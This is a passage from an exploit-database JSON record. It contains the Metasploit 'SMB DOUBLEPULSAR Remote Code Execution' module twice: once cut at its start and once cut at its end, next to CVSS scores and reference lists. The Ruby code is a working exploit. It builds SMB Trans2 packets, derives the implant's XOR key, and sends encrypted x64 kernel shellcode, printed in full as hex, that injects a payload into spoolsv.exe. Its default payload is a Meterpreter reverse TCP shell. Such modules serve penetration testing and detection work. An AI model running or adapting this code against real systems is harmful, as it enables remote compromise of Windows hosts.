fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-26] #"}, "lastseen": "2021-10-26T08:20:15", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2d7dbe8a865bdaad8866e354e04f9617", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-26T22:27:57", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T22:27:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-26T22:27:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def 